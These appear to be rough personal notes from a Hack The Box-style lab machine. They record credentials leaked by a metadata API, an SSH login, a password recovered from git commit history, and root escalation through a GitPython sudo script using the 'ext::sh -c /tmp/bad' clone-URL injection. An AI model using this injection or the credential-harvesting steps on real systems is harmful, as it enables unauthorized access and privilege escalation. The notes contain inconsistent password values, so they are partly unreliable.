Contact us: submissions@tiempoarriba.htb
Port 5000 returned differnt image which was a file downloaded
static/uploads/f21b2992-e049-4139-aec8-d28f0fd28941
/api/latest/metadata/messages/authors
It say in the description that retrieve the welcome message sended to our new authors.
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
username : dev password : dev090217_devAPI!A
ssh dev@10.10.11.20
dev080217_devAPI!@
9802795d234c2c68dd3884b945af60a3
SO i need to check the commit
1e84a036b2f33c59e2390730699a488c65643d28 b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
prod
080217_Producti0n_2023!@
su prod
Gitpython
pip show gitpython
Name: GitPython Version: 3.1.29 Summary: GitPython is a python library used to interact with Git repositories
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
Found using gitpython vulnerbiltiy and chatgpt
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c /tmp/bad"
